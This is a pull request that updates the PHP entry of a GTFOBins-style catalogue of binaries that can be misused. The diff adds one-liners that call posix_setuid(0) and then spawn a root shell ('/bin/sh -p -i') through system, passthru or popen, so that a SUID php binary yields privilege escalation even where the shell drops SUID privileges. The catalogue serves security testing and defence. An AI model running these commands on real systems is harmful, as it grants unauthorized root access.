### PR TITLE
php: add posix_setuid(0) SUID bypass for system, passthru, popen

### DIFF
--- a/_gtfobins/php
+++ b/_gtfobins/php
@@ -64,7 +64,9 @@ functions:
         - CAP_SETUID
       sudo:
       suid:
-        shell: true
+        code: |-
+          php -r 'posix_setuid(0); system("/bin/sh -p -i");'
+        shell: false
       unprivileged:
     tty: false
   - code: |-
@@ -77,7 +79,9 @@ functions:
         - CAP_SETUID
       sudo:
       suid:
-        shell: true
+        code: |-
+          php -r 'posix_setuid(0); passthru("/bin/sh -p -i");'
+        shell: false
       unprivileged:
     tty: false
   - code: |-
@@ -90,7 +94,9 @@ functions:
         - CAP_SETUID
       sudo:
       suid:
-        shell: true
+        code: |-
+          php -r 'posix_setuid(0); $h=@popen("/bin/sh -p -i","r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
+        shell: false
       unprivileged:
     tty: false
   - code: |-


### PR DESCRIPTION
The SUID entries for system(), passthru(), and popen() are marked shell: true, which displays a warning that they only work on distributions where the default shell doesn't drop SUID privileges. Adding posix_setuid(0) before spawning the shell makes these work regardless since the real UID gets set to match the effective UID, so the shell has no mismatch to act on.